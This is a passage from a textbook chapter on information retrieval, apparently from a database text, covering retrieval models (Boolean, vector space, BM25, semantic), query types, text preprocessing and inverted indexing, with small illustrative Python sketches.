Eventually, the user ends his search at the Fall schedule for the Yellow Jackets foot-
ball team, which he finds to be of great interest. This user activity is known as
browsing. Hyperlinks are used to interconnect Web pages and are mainly used for
browsing. Anchor texts are text phrases within documents used to label hyperlinks
and are very relevant to browsing.


Web search combines both aspects—browsing and retrieval—and is one of the
main applications of information retrieval today. Web pages are analogous to docu-
ments. Web search engines maintain an indexed repository of Web pages, usually
using the technique of inverted indexing (see Section 5). They retrieve the most rel-
evant Web pages for the user in response to the user’s search request with a possible
ranking in descending order of relevance. The rank of a Webpage in a retrieved set
is the measure of its relevance to the query that generated the result set.

1.5 Generic IR Pipeline
As we mentioned earlier, documents are made up of unstructured natural language
text composed of character strings from English and other languages. Common
examples of documents include newswire services (such as AP or Reuters), corpo-
rate manuals and reports, government notices, Web page articles, blogs, tweets,
books, and journal papers. There are two main approaches to IR: statistical and
semantic.

In a statistical approach, documents are analyzed and broken down into chunks of
text (words, phrases, or n-grams, which are all subsequences of length n characters
in a text or document) and each word or phrase is counted, weighted, and measured
for relevance or importance. These words and their properties are then compared
with the query terms for potential degree of match to produce a ranked list of
resulting documents that contain the words. Statistical approaches are further clas-
sified based on the method employed. The three main statistical approaches are
Boolean, vector space, and probabilistic (see Section 2).

Semantic approaches to IR use knowledge-based techniques of retrieval that
broadly rely on the syntactic, lexical, sentential, discourse-based, and pragmatic lev-
els of knowledge understanding. In practice, semantic approaches also apply some
form of statistical analysis to improve the retrieval process.

Figure 1 shows the various stages involved in an IR processing system. The steps
shown on the left in Figure 1 are typically offline processes, which prepare a set of
documents for efficient retrieval; these are document preprocessing, document
modeling, and indexing. The steps involved in query formation, query processing,
searching mechanism, document retrieval, and relevance feedback are shown on the
right in Figure 1. In each box, we highlight the important concepts and issues. The
rest of this chapter describes some of the concepts involved in the various tasks
within the IR process shown in Figure 1.

Figure 1
Generic IR framework. (Offline steps, shown on the left of the figure: document preprocessing, modeling, and indexing. Online steps, shown on the right: query formation, query processing, searching mechanism, document retrieval, and relevance feedback, with metadata integration and ranking of results.)

Figure 2 shows a simplified IR processing pipeline. In order to perform retrieval on
documents, the documents are first represented in a form suitable for retrieval. The
significant terms and their properties are extracted from the documents and are
represented in a document index where the words/terms and their properties are
stored in a matrix that contains these terms and the references to the documents
that contain them. This index is then converted into an inverted index (see Figure 4)
of a word/term vs. document matrix. Given the query words, the documents con-
taining these words—and the document properties, such as date of creation, author,
and type of document—are fetched from the inverted index and compared with the
query. This comparison results in a ranked list shown to the user. The user can then
provide feedback on the results that triggers implicit or explicit query expansion to
fetch results that are more relevant for the user. Most IR systems allow for an inter-
active search where the query and the results are successively refined.

Figure 2
Simplified IR process pipeline. (Documents are processed and extracted into an index, which is inverted into a term-document matrix; the user’s query is processed and compared against the inverted index, matching documents are fetched and ranked, and feedback on the results refines the query.)

2 Retrieval Models
In this section we briefly describe the important models of IR. These are the three
main statistical models—Boolean, vector space, and probabilistic—and the seman-
tic model.


2.1 Boolean Model
In this model, documents are represented as a set of terms. Queries are formulated
as a combination of terms using the standard Boolean logic set-theoretic operators
such as AND, OR and NOT. Retrieval and relevance are considered as binary concepts
in this model, so the retrieved elements are an “exact match” retrieval of relevant
documents. There is no notion of ranking of resulting documents. All retrieved
documents are considered equally important—a major simplification that does not
consider frequencies of document terms or their proximity to other terms com-
pared against the query terms.
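As a minimal sketch of this idea (the documents, terms, and the boolean_query helper below are hypothetical illustrations, not part of the text), each document can be represented as a set of terms and a query evaluated with ordinary set logic:

# A minimal sketch of Boolean retrieval: documents are term sets, and a query
# such as (database AND index) AND NOT sql is evaluated with set membership.
docs = {
    1: {"database", "index", "btree"},
    2: {"database", "sql", "query"},
    3: {"index", "market", "stock"},
}

def boolean_query(docs, must=(), must_not=()):
    """Return ids of documents containing all 'must' terms and none of 'must_not'."""
    result = set()
    for doc_id, terms in docs.items():
        if all(t in terms for t in must) and not any(t in terms for t in must_not):
            result.add(doc_id)
    return result

print(boolean_query(docs, must=["database", "index"], must_not=["sql"]))  # {1}

Note that the result is an unranked set: document 1 either satisfies the query or it does not.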

Boolean retrieval models lack sophisticated ranking algorithms and are among the
earliest and simplest information retrieval models. These models make it easy to
associate metadata information and write queries that match the contents of the
documents as well as other properties of documents, such as date of creation,
author, and type of document.

2.2 Vector Space Model
The vector space model provides a framework in which term weighting, ranking of
retrieved documents, and relevance feedback are possible. Documents are repre-
sented as features and weights of term features in an n-dimensional vector space of
terms. Features are a subset of the terms in a set of documents that are deemed most
relevant to an IR search for this particular set of documents. The process of select-
ing these important terms (features) and their properties as a sparse (limited) list
out of the very large number of available terms (the vocabulary can contain hun-
dreds of thousands of terms) is independent of the model specification. The query
is also specified as a terms vector (vector of features), and this is compared to the
document vectors for similarity/relevance assessment.

The similarity assessment function that compares two vectors is not inherent to the
model—different similarity functions can be used. However, the cosine of the angle
between the query and document vector is a commonly used function for similarity
assessment. As the angle between the vectors decreases, the cosine of the angle
approaches one, meaning that the similarity of the query with a document vector
increases. Terms (features) are weighted proportional to their frequency counts to
reflect the importance of terms in the calculation of relevance measure. This is dif-
ferent from the Boolean model, which does not take into account the frequency of
words in the document for relevance match.

In the vector model, the document term weight wij (for term i in document j) is repre-
sented based on some variation of the TF (term frequency) or TF-IDF (term
frequency-inverse document frequency) scheme (as we will describe below). TF-IDF
is a statistical weight measure that is used to evaluate the importance of a document
word in a collection of documents. The following formula is typically used:

cosine(dj, q) = (dj • q)/(||dj|| × ||q||) = Σi=1 to |V| (wij × wiq) / (√(Σi=1 to |V| wij²) × √(Σi=1 to |V| wiq²))

In the formula given above, we use the following symbols:

■ dj is the document vector.

■ q is the query vector.

■ wij is the weight of term i in document j.

■ wiq is the weight of term i in query vector q.

■ |V| is the number of dimensions in the vector that is the total number of
important keywords (or features).

TF-IDF uses the product of normalized frequency of a term i (TFij) in document Dj
and the inverse document frequency of the term i (IDFi) to weight a term in a
document. The idea is that terms that capture the essence of a document occur fre-
quently in the document (that is, their TF is high), but if such a term were to be a
good term that discriminates the document from others, it must occur in only a few
documents in the general population (that is, its IDF should be high as well).

IDF values can be easily computed for a fixed collection of documents. In the case of
Web search engines, taking a representative sample of documents approximates the IDF
computation. The following formulas can be used:

TFij = fij / Σi=1 to |V| fij

IDFi = log(N/ni)

In these formulas, the meaning of the symbols is:

■ TFij is the normalized term frequency of term i in document Dj.
■ fij is the number of occurrences of term i in document Dj.
■ IDFi is the inverse document frequency weight for term i.
■ N is the number of documents in the collection.
■ ni is the number of documents in which term i occurs.

Note that if a term i occurs in all documents, then ni = N and hence IDFi = log (1)
becomes zero, nullifying its importance and creating a situation where division by
zero can occur. The weight of term i in document j, wij, is computed based on its TF-
IDF value in some techniques. To prevent division by zero, it is common to add a 1
to the denominator in the formulae such as the cosine formula above.
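The TF-IDF weighting and cosine comparison described above can be illustrated with a small sketch. The corpus, the tf/idf/cosine helper names, and the query below are hypothetical; a real system would precompute and normalize these weights in the index rather than recompute them per query:

import math

# Toy corpus: each document is a list of already-preprocessed tokens.
docs = {
    "D1": ["stock", "market", "index", "market"],
    "D2": ["inverted", "index", "data", "structure"],
    "D3": ["stock", "index", "fund"],
}
N = len(docs)

def tf(term, tokens):
    # Normalized term frequency: count of the term divided by the document length.
    return tokens.count(term) / len(tokens)

def idf(term):
    n_i = sum(1 for tokens in docs.values() if term in tokens)
    return math.log(N / n_i) if n_i else 0.0

vocab = sorted({t for tokens in docs.values() for t in tokens})

def tfidf_vector(tokens):
    return [tf(t, tokens) * idf(t) for t in vocab]

def cosine(u, v):
    dot = sum(a * b for a, b in zip(u, v))
    norm = math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v))
    return dot / norm if norm else 0.0  # guard against the zero-vector case noted above

query = ["stock", "market"]
q_vec = tfidf_vector(query)
for doc_id, tokens in docs.items():
    print(doc_id, round(cosine(q_vec, tfidf_vector(tokens)), 3))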

Sometimes, the relevance of the document with respect to a query (rel(Dj,Q)) is
directly measured as the sum of the TF-IDF values of the terms in the Query Q:

rel(Dj, Q) = Σi∈Q (TFij × IDFi)

The normalization factor (similar to the denominator of the cosine formula) is
incorporated into the TF-IDF formula itself, thereby measuring relevance of a doc-
ument to the query by the computation of the dot product of the query and docu-
ment vectors.

The Rocchio10 algorithm is a well-known relevance feedback algorithm based on
the vector space model that modifies the initial query vector and its weights in
response to user-identified relevant documents. It expands the original query vector
q to a new vector qe as follows:

qe = αq + (β/|Dr|) Σdr∈Dr dr − (γ/|Dir|) Σdir∈Dir dir

10See Rocchio (1971).


Here, Dr and Dir are relevant and nonrelevant document sets and α, β, and γ are
parameters of the equation. The values of these parameters determine how the feed-
back affects the original query, and these may be determined after a number of trial-
and-error experiments.
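A minimal sketch of this expansion, assuming the query and document vectors are plain lists of weights over the same vocabulary; the function name rocchio_expand and the parameter values α = 1.0, β = 0.75, γ = 0.15 are illustrative choices, not prescribed by the text:

def rocchio_expand(q, relevant, nonrelevant, alpha=1.0, beta=0.75, gamma=0.15):
    """Expand query vector q using lists of relevant/nonrelevant document vectors."""
    dims = len(q)
    def centroid(vectors):
        if not vectors:
            return [0.0] * dims
        return [sum(v[i] for v in vectors) / len(vectors) for i in range(dims)]
    rel_c = centroid(relevant)
    nonrel_c = centroid(nonrelevant)
    return [alpha * q[i] + beta * rel_c[i] - gamma * nonrel_c[i] for i in range(dims)]

q = [0.5, 0.0, 0.5]                            # original query weights
relevant = [[0.4, 0.3, 0.0], [0.6, 0.1, 0.2]]  # user-identified relevant documents
nonrelevant = [[0.0, 0.9, 0.1]]
print(rocchio_expand(q, relevant, nonrelevant))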

2.3 Probabilistic Model
The similarity measures in the vector space model are somewhat ad hoc. For exam-
ple, the model assumes that those documents closer to the query in cosine space are
more relevant to the query vector. In the probabilistic model, a more concrete and
definitive approach is taken: ranking documents by their estimated probability of
relevance with respect to the query and the document. This is the basis of the
Probability Ranking Principle developed by Robertson.11

In the probabilistic framework, the IR system has to decide whether the documents
belong to the relevant set or the nonrelevant set for a query. To make this decision,
it is assumed that a predefined relevant set and nonrelevant set exist for the query,
and the task is to calculate the probability that the document belongs to the relevant
set and compare that with the probability that the document belongs to the nonrel-
evant set.

Given the document representation D of a document, estimating the relevance R
and nonrelevance NR of that document involves computation of conditional prob-
ability P(R|D) and P(NR|D). These conditional probabilities can be calculated using
Bayes’ Rule:12

P(R|D) = P(D|R) × P(R)/P(D)
P(NR|D) = P(D|NR) × P(NR)/P(D)

A document D is classified as relevant if P(R|D) > P(NR|D). Discarding the constant
P(D), this is equivalent to saying that a document is relevant if:

P(D|R) × P(R) > P(D|NR) × P(NR)

The likelihood ratio P(D|R)/P(D|NR) is used as a score to determine the likelihood
of the document with representation D belonging to the relevant set.

The term independence or Naïve Bayes assumption is used to estimate P(D|R) using
computation of P(ti|R) for term ti. The likelihood ratios P(D|R)/P(D|NR) of docu-
ments are used as a proxy for ranking based on the assumption that highly ranked
documents will have a high likelihood of belonging to the relevant set.13

11For a description of the Cheshire II system, see Robertson (1997).
12Bayes’ theorem is a standard technique for measuring likelihood; see Howson and Urbach (1993), for
example.
13Readers should refer to Croft et al. (2009) pages 246–247 for a detailed description.


With some reasonable assumptions and estimates about the probabilistic model
along with extensions for incorporating query term weights and document term
weights in the model, a probabilistic ranking algorithm called BM25 (Best Match
25) is quite popular. This weighting scheme has evolved from several versions of the
Okapi14 system.

14City University of London Okapi System by Robertson, Walker, and Hancock-Beaulieu (1995).

The Okapi weight for Document dj and query q is computed by the formula below.
Additional notations are as follows:

■ ti is a term.

■ fij is the raw frequency count of term ti in document dj.

■ fiq is the raw frequency count of term ti in query q.

■ N is the total number of documents in the collection.

■ dfi is the number of documents that contain the term ti.

■ dlj is the document length (in bytes) of dj.

■ avdl is the average document length of the collection.

The Okapi relevance score of a document dj for a query q is given by the equation
below, where k1 (between 1.0 and 2.0), b (usually 0.75), and k2 (between 1 and 1000) are
parameters:

okapi(dj, q) = Σti∈q,dj ln((N − dfi + 0.5)/(dfi + 0.5)) × ((k1 + 1) fij)/(k1(1 − b + b × dlj/avdl) + fij) × ((k2 + 1) fiq)/(k2 + fiq)
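The Okapi scoring can be sketched directly from this formula. The okapi_bm25 helper, the default parameter values, and the collection statistics below are hypothetical, and document length is approximated here by token count rather than bytes:

import math

def okapi_bm25(query_terms, doc_terms, doc_freq, N, avdl, k1=1.2, b=0.75, k2=100.0):
    """Score one document for a query using the Okapi formula above.
    query_terms / doc_terms: lists of tokens; doc_freq: dict term -> dfi;
    N: number of documents in the collection; avdl: average document length."""
    dl = len(doc_terms)  # document length approximated by token count
    score = 0.0
    for t in set(query_terms):
        if t not in doc_terms or t not in doc_freq:
            continue
        f_ij = doc_terms.count(t)    # raw frequency of t in the document
        f_iq = query_terms.count(t)  # raw frequency of t in the query
        idf = math.log((N - doc_freq[t] + 0.5) / (doc_freq[t] + 0.5))
        tf_doc = ((k1 + 1) * f_ij) / (k1 * (1 - b + b * dl / avdl) + f_ij)
        tf_query = ((k2 + 1) * f_iq) / (k2 + f_iq)
        score += idf * tf_doc * tf_query
    return score

# Hypothetical statistics for a small collection of 1,000 documents.
doc_freq = {"stock": 40, "market": 25, "index": 60}
doc = ["stock", "market", "index", "market", "fund"]
print(round(okapi_bm25(["stock", "market"], doc, doc_freq, N=1000, avdl=6.0), 3))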

2.4 Semantic Model
However sophisticated the above statistical models become, they can miss many rel-
evant documents because those models do not capture the complete meaning or
information need conveyed by a user’s query. In semantic models, the process of
matching documents to a given query is based on concept level and semantic
matching instead of index term (keyword) matching. This allows retrieval of rele-
vant documents that share meaningful associations with other documents in the
query result, even when these associations are not inherently observed or statisti-
cally captured.

Semantic approaches include different levels of analysis, such as morphological,
syntactic, and semantic analysis, to retrieve documents more effectively. In
morphological analysis, roots and affixes are analyzed to determine the parts of
speech (nouns, verbs, adjectives, and so on) of the words. Following morphological
analysis, syntactic analysis follows to parse and analyze complete phrases in docu-
ments. Finally, the semantic methods have to resolve word ambiguities and/or gen-
erate relevant synonyms based on the semantic relationships between levels of
structural entities in documents (words, paragraphs, pages, or entire documents).


The development of a sophisticated semantic system requires complex knowledge
bases of semantic information as well as retrieval heuristics. These systems often
require techniques from artificial intelligence and expert systems. Knowledge bases
like Cyc15 and WordNet16 have been developed for use in knowledge-based IR sys-
tems based on semantic models. The Cyc knowledge base, for example, is a represen-
tation of a vast quantity of commonsense knowledge about assertions (over 2.5
million facts and rules) interrelating more than 155,000 concepts for reasoning
about the objects and events of everyday life. WordNet is an extensive thesaurus
(over 115,000 concepts) that is very popular and is used by many systems and is
under continuous development (see Section 4.3).

15See Lenat (1995).
16See Miller (1990) for a detailed description of WordNet.

3 Types of Queries in IR Systems
Different keywords are associated with the document set during the process of
indexing. These keywords generally consist of words, phrases, and other characteri-
zations of documents such as date created, author names, and type of document.
They are used by an IR system to build an inverted index (see Section 5), which is
then consulted during the search. The queries formulated by users are compared to
the set of index keywords. Most IR systems also allow the use of Boolean and other
operators to build a complex query. The query language with these operators
enriches the expressiveness of a user’s information need.

3.1 Keyword Queries
Keyword-based queries are the simplest and most commonly used forms of IR
queries: the user just enters keyword combinations to retrieve documents. The
query keyword terms are implicitly connected by a logical AND operator. A query
such as ‘database concepts’ retrieves documents that contain both the words ‘data-
base’ and ‘concepts’ at the top of the retrieved results. In addition, most systems also
retrieve documents that contain only ‘database’ or only ‘concepts’ in their text. Some
systems remove most commonly occurring words (such as a, the, of, and so on,
called stopwords) as a preprocessing step before sending the filtered query key-
words to the IR engine. Most IR systems do not pay attention to the ordering of
these words in the query. All retrieval models provide support for keyword queries.

3.2 Boolean Queries
Some IR systems allow using the AND, OR, NOT, ( ), + , and – Boolean operators in
combinations of keyword formulations. AND requires that both terms be found.
OR lets either term be found. NOT means any record containing the second term
will be excluded. ‘( )’ means the Boolean operators can be nested using parentheses.
‘+’ is equivalent to AND, requiring the term; the ‘+’ should be placed directly in front
of the search term. ‘–’ is equivalent to AND NOT and means to exclude the term; the
‘–’ should be placed directly in front of the search term not wanted. Complex
Boolean queries can be built out of these operators and their combinations, and
they are evaluated according to the classical rules of Boolean algebra. No ranking is
possible, because a document either satisfies such a query (is “relevant”) or does not
satisfy it (is “nonrelevant”). A document is retrieved for a Boolean query if the
query is logically true as an exact match in the document. Users generally do not use
combinations of these complex Boolean operators, and IR systems support a
restricted version of these set operators. Boolean retrieval models can directly sup-
port different Boolean operator implementations for these kinds of queries.

3.3 Phrase Queries
When documents are represented using an inverted keyword index for searching,
the relative order of the terms in the document is lost. In order to perform exact
phrase retrieval, these phrases should be encoded in the inverted index or imple-
mented differently (with relative positions of word occurrences in documents). A
phrase query consists of a sequence of words that makes up a phrase. The phrase is
generally enclosed within double quotes. Each retrieved document must contain at
least one instance of the exact phrase. Phrase searching is a more restricted and spe-
cific version of proximity searching that we mention below. For example, a phrase
searching query could be ‘conceptual database design’. If phrases are indexed by the
retrieval model, any retrieval model can be used for these query types. A phrase the-
saurus may also be used in semantic models for fast dictionary searching for
phrases.
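Exact phrase matching against a positional index can be sketched as follows; the postings layout (term -> {doc: [positions]}) and the phrase_match helper are hypothetical illustrations of the idea, not a prescribed format:

# Positional postings: term -> {doc_id: [positions of the term in that document]}.
postings = {
    "conceptual": {1: [5], 2: [12]},
    "database":   {1: [6, 20], 2: [2]},
    "design":     {1: [7], 2: [13]},
}

def phrase_match(phrase, postings):
    """Return ids of documents containing the words of 'phrase' at consecutive positions."""
    words = phrase.split()
    if any(w not in postings for w in words):
        return set()
    candidates = set(postings[words[0]])
    for w in words[1:]:
        candidates &= set(postings[w])  # documents containing every word of the phrase
    result = set()
    for doc in candidates:
        first_positions = postings[words[0]][doc]
        if any(all(p + k in postings[words[k]][doc] for k in range(1, len(words)))
               for p in first_positions):
            result.add(doc)
    return result

print(phrase_match("conceptual database design", postings))  # {1}

A proximity operator such as NEAR can be supported by relaxing the consecutive-position test to a maximum allowed distance between positions.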

3.4 Proximity Queries
Proximity search refers to a search that accounts for how close within a record mul-
tiple terms should be to each other. The most commonly used proximity search
option is a phrase search that requires terms to be in the exact order. Other proxim-
ity operators can specify how close terms should be to each other. Some will also
specify the order of the search terms. Each search engine can define proximity oper-
ators differently, and the search engines use various operator names such as NEAR,
ADJ(adjacent), or AFTER. In some cases, a sequence of single words is given,
together with a maximum allowed distance between them. Vector space models that
also maintain information about positions and offsets of tokens (words) have
robust implementations for this query type. However, providing support for com-
plex proximity operators becomes computationally expensive because it requires
the time-consuming preprocessing of documents, and is thus suitable for smaller
document collections rather than for the Web.

3.5 Wildcard Queries
Wildcard searching is generally meant to support regular expressions and pattern
matching-based searching in text. In IR systems, certain kinds of wildcard search
support may be implemented—usually words with any trailing characters (for
example, ‘data*’ would retrieve data, database, datapoint, dataset, and so on).
Providing support for wildcard searches in IR systems involves preprocessing over-
head and is not considered worth the cost by many Web search engines today.
Retrieval models do not directly provide support for this query type.

3.6 Natural Language Queries
There are a few natural language search engines that aim to understand the struc-
ture and meaning of queries written in natural language text, generally as a question
or narrative. This is an active area of research that employs techniques like shallow
semantic parsing of text, or query reformulations based on natural language under-
standing. The system tries to formulate answers for such queries from retrieved
results. Some search systems are starting to provide natural language interfaces to
provide answers to specific types of questions, such as definition and factoid ques-
tions, which ask for definitions of technical terms or common facts that can be
retrieved from specialized databases. Such questions are usually easier to answer
because there are strong linguistic patterns giving clues to specific types of sen-
tences—for example, ‘defined as’ or ‘refers to’. Semantic models can provide support
for this query type.

4 Text Preprocessing
In this section we review the commonly used text preprocessing techniques that are
part of the text processing task in Figure 1.

4.1 Stopword Removal
Stopwords are very commonly used words in a language that play a major role in
the formation of a sentence but which seldom contribute to the meaning of that
sentence. Words that are expected to occur in 80 percent or more of the documents
in a collection are typically referred to as stopwords, and they are rendered poten-
tially useless. Because of the commonness and function of these words, they do not
contribute much to the relevance of a document for a query search. Examples
include words such as the, of, to, a, and, in, said, for, that, was, on, he, is, with, at, by,
and it. These words are presented here with decreasing frequency of occurrence
from a large corpus of documents called AP89.17 The first six of these words account
for 20 percent of all words in the listing, and the most frequent 50 words account for
40 percent of all text.

Removal of stopwords from a document must be performed before indexing.
Articles, prepositions, conjunctions, and some pronouns are generally classified as
stopwords. Queries must also be preprocessed for stopword removal before the
actual retrieval process. Removal of stopwords results in elimination of possible
spurious indexes, thereby reducing the size of an index structure by about 40
percent or more. However, doing so could impact the recall if the stopword is an
integral part of a query (for example, a search for the phrase ‘To be or not to be,’
where removal of stopwords makes the query inappropriate, as all the words in the
phrase are stopwords). Many search engines do not employ query stopword
removal for this reason.

17For details, see Croft et al. (2009), pages 75–90.

4.2 Stemming
A stem of a word is defined as the word obtained after trimming the suffix and pre-
fix of an original word. For example, ‘comput’ is the stem word for computer, com-
puting, and computation. These suffixes and prefixes are very common in the
English language for supporting the notion of verbs, tenses, and plural forms.
Stemming reduces the different forms of the word formed by inflection (due to plu-
rals or tenses) and derivation to a common stem.

A stemming algorithm can be applied to reduce any word to its stem. In English, the
most famous stemming algorithm is Martin Porter’s stemming algorithm. The
Porter stemmer18 is a simplified version of Lovins’ technique that uses a reduced set
of about 60 rules (from 260 suffix patterns in Lovins’ technique) and organizes
them into sets; conflicts within one subset of rules are resolved before going on to
the next. Using stemming for preprocessing data results in a decrease in the size of
the indexing structure and an increase in recall, possibly at the cost of precision.
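A toy preprocessing pass combining stopword removal with naive suffix stripping is sketched below; the stopword list is abbreviated and the suffix rules are illustrative only—this is not the Porter (or Lovins) algorithm:

# Toy preprocessing: stopword removal plus naive suffix stripping (illustration only).
STOPWORDS = {"the", "of", "to", "a", "and", "in", "is", "for", "that", "on", "with", "at", "by", "it"}
SUFFIXES = ("ational", "ation", "ing", "ers", "er", "ed", "es", "s")

def naive_stem(word):
    for suffix in SUFFIXES:
        if word.endswith(suffix) and len(word) - len(suffix) >= 3:
            return word[: -len(suffix)]
    return word

def preprocess(text):
    tokens = [t.lower() for t in text.split()]
    return [naive_stem(t) for t in tokens if t not in STOPWORDS]

print(preprocess("the computers and computing of computation"))
# -> ['comput', 'comput', 'comput']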

4.3 Utilizing a Thesaurus
A thesaurus comprises a precompiled list of important concepts and the main word
that describes each concept for a particular domain of knowledge. For each concept
in this list, a set of synonyms and related words is also compiled.19 Thus, a synonym
can be converted to its matching concept during preprocessing. This preprocessing
step assists in providing a standard vocabulary for indexing and searching. Usage of
a thesaurus, also known as a collection of synonyms, has a substantial impact on the
recall of information systems. This process can be complicated because many words
have different meanings in different contexts.

UMLS20 is a large biomedical thesaurus of millions of concepts (called the
Metathesaurus) and a semantic network of meta concepts and relationships that
organize the Metathesaurus (see Figure 3). The concepts are assigned labels from
the semantic network. This thesaurus of concepts contains synonyms of medical
terms, hierarchies of broader and narrower terms, and other relationships among
words and concepts that make it a very extensive resource for information retrieval
of documents in the medical domain. Figure 3 illustrates part of the UMLS
Semantic Network.

18See Porter (1980).
19See Baeza-Yates and Ribeiro-Neto (1999).
20Unified Medical Language System from the National Library of Medicine.

Figure 3
A Portion of the UMLS Semantic Network: “Biologic Function” Hierarchy. (Concepts shown include Biologic Function, Physiologic Function, Pathologic Function, Organism Function, Organ or Tissue Function, Cell Function, Molecular Function, Mental Process, Genetic Function, Disease or Syndrome, Cell or Molecular Dysfunction, Experimental Model of Disease, Mental or Behavioral Dysfunction, and Neoplastic Process.)
Source: UMLS Reference Manual, National Library of Medicine.

WordNet21 is a manually constructed thesaurus that groups words into strict syn-
onym sets called synsets. These synsets are divided into noun, verb, adjective, and
adverb categories. Within each category, these synsets are linked together by appro-
priate relationships such as class/subclass or “is-a” relationships for nouns.

WordNet is based on the idea of using a controlled vocabulary for indexing, thereby
eliminating redundancies. It is also useful in providing assistance to users with
locating terms for proper query formulation.

21See Fellbaum (1998) for a detailed description of WordNet.

4.4 Other Preprocessing Steps: Digits, Hyphens, Punctuation
Marks, Cases

Digits, dates, phone numbers, e-mail addresses, URLs, and other standard types of
text may or may not be removed during preprocessing. Web search engines,
however, index them in order to use this type of information in the document
metadata to improve precision and recall (see Section 6 for detailed definitions of
precision and recall).

Hyphens and punctuation marks may be handled in different ways. Either the entire
phrase with the hyphens/punctuation marks may be used, or they may be elimi-
nated. In some systems, the character representing the hyphen/punctuation mark
may be removed, or may be replaced with a space. Different information retrieval
systems follow different rules of processing. Handling hyphens automatically can be
complex: it can either be done as a classification problem, or more commonly by
some heuristic rules.

Most information retrieval systems perform case-insensitive search, converting all
the letters of the text to uppercase or lowercase. It is also worth noting that many of
these text preprocessing steps are language specific, such as involving accents and
diacritics and the idiosyncrasies that are associated with a particular language.

4.5 Information Extraction
Information extraction (IE) is a generic term used for extracting structured con-
tent from text. Text analytic tasks such as identifying noun phrases, facts, events,
people, places, and relationships are examples of IE tasks. These tasks are also called
named entity recognition tasks and use rule-based approaches with either a the-
saurus, regular expressions and grammars, or probabilistic approaches. For IR and
search applications, IE technologies are mostly used to identify contextually rele-
vant features that involve text analysis, matching, and categorization for improving
the relevance of search systems. Language technologies using part-of-speech tagging
are applied to semantically annotate the documents with extracted features to aid
search relevance.

5 Inverted Indexing
The simplest way to search for occurrences of query terms in text collections is to
scan the text sequentially. This kind of online searching is only
appropriate when text collections are quite small. Most information retrieval sys-
tems process the text collections to create indexes and operate upon the inverted
index data structure (refer to the indexing task in Figure 1). An inverted index struc-
ture comprises vocabulary and document information. Vocabulary is a set of dis-
tinct query terms in the document set. Each term in a vocabulary set has an
associated collection of information about the documents that contain the term,
such as document id, occurrence count, and offsets within the document where the
term occurs. The simplest form of vocabulary terms consists of words or individual
tokens of the documents. In some cases, these vocabulary terms also consist of
phrases, n-grams, entities, links, names, dates, or manually assigned descriptor
terms from documents and/or Web pages. For each term in the vocabulary, the cor-
responding document ids, occurrence locations of the term in each document,
number of occurrences of the term in each document, and other relevant informa-
tion may be stored in the document information section.

Weights are assigned to document terms to represent an estimate of the usefulness
of the given term as a descriptor for distinguishing the given document from other
documents in the same collection. A term may be a better descriptor of one docu-
ment than of another by the weighting process (see Section 2).

An inverted index of a document collection is a data structure that attaches each distinct
term to a list of all documents that contain the term. The process of inverted
index construction involves the extraction and processing steps shown in Figure 2.
Acquired text is first preprocessed and the documents are represented with the
vocabulary terms. Documents’ statistics are collected in document lookup tables.
Statistics generally include counts of vocabulary terms in individual documents as
well as different collections, their positions of occurrence within the documents,
and the lengths of the documents. The vocabulary terms are weighted at indexing
time according to different criteria for collections. For example, in some cases terms
in the titles of the documents may be weighted more heavily than terms that occur
in other parts of the documents.

One of the most popular weighting schemes is the TF-IDF (term frequency-inverse
document frequency) metric that we described in Section 2. For a given term this
weighting scheme distinguishes to some extent the documents in which the term
occurs more often from those in which the term occurs very little or never. These
weights are normalized to account for varying document lengths, further ensuring
that longer documents with proportionately more occurrences of a word are not
favored for retrieval over shorter documents with proportionately fewer occur-
rences. These processed document-term streams (matrices) are then inverted into
term-document streams (matrices) for further IR steps.

Figure 4 shows an illustration of term-document-position vectors for the four illus-
trative terms—example, inverted, index, and market—which refer to the three docu-
ments and the position where they occur in those documents.

Figure 4
Example of an inverted index.

Document 1: This example shows an example of an inverted index.
Document 2: Inverted index is a data structure for associating terms to documents.
Document 3: Stock market index is used for capturing the sentiments of the financial market.

ID   Term       Document: position
1.   example    1:2, 1:5
2.   inverted   1:8, 2:1
3.   index      1:9, 2:2, 3:3
4.   market     3:2, 3:13

The different steps involved in inverted index construction can be summarized as
follows:

1. Break the documents into vocabulary terms by tokenizing, cleansing,
stopword removal, stemming, and/or use of an additional thesaurus as
vocabulary.

2. Collect document statistics and store the statistics in a document lookup
table.

3. Invert the document-term stream into a term-document stream along with
additional information such as term frequencies, term positions, and term
weights.
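The three construction steps above can be sketched for the example documents of Figure 4. Tokenization here is a bare lowercase split, standing in for the preprocessing of Section 4, and the variable names are hypothetical:

from collections import defaultdict

docs = {
    1: "This example shows an example of an inverted index",
    2: "Inverted index is a data structure for associating terms to documents",
    3: "Stock market index is used for capturing the sentiments of the financial market",
}

# Steps 1-2: tokenize and collect per-document statistics (here, document lengths).
doc_tokens = {d: text.lower().split() for d, text in docs.items()}
doc_lengths = {d: len(toks) for d, toks in doc_tokens.items()}

# Step 3: invert the document-term stream into term -> {doc_id: [positions]}.
inverted_index = defaultdict(lambda: defaultdict(list))
for doc_id, tokens in doc_tokens.items():
    for position, term in enumerate(tokens, start=1):
        inverted_index[term][doc_id].append(position)

print(dict(inverted_index["index"]))   # {1: [9], 2: [2], 3: [3]}
print(dict(inverted_index["market"]))  # {3: [2, 13]}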

Searching for relevant documents from the inverted index, given a set of query
terms, is generally a three-step process.

1. Vocabulary search. If the query comprises multiple terms, they are sepa-
rated and treated as independent terms. Each term is searched in the vocab-
ulary. Various data structures, like variations of B+-tree or hashing, may be

used to optimize the search process. Query terms may also be ordered in lex-
icographic order to improve space efficiency.

2. Document information retrieval. The document information for each term
is retrieved.

3. Manipulation of retrieved information. The document information vector
for each term obtained in step 2 is now processed further to incorporate var-
ious forms of query logic. Various kinds of queries like prefix, range, context,
and proximity queries are processed in this step to construct the final result
based on the document collections returned in step 2.
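Continuing the sketch above and assuming the same hypothetical inverted_index, the three search steps can be approximated for a conjunctive keyword query by intersecting the posting lists and ranking by total term frequency (a crude stand-in for the weighted ranking of Section 2):

def search(query, inverted_index):
    """Steps 1-3 for a conjunctive keyword query: look up each term's postings,
    intersect the document sets, and rank by total in-document frequency."""
    terms = query.lower().split()
    postings = [inverted_index.get(t, {}) for t in terms]   # step 1: vocabulary search
    if not postings or any(not p for p in postings):
        return []
    doc_ids = set(postings[0])                              # step 2: fetch document info
    for p in postings[1:]:
        doc_ids &= set(p)
    scored = [(sum(len(p[d]) for p in postings), d) for d in doc_ids]  # step 3: rank
    return [d for score, d in sorted(scored, reverse=True)]

print(search("inverted index", inverted_index))  # [2, 1]: both documents contain both terms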

6 Evaluation Measures of Search Relevance

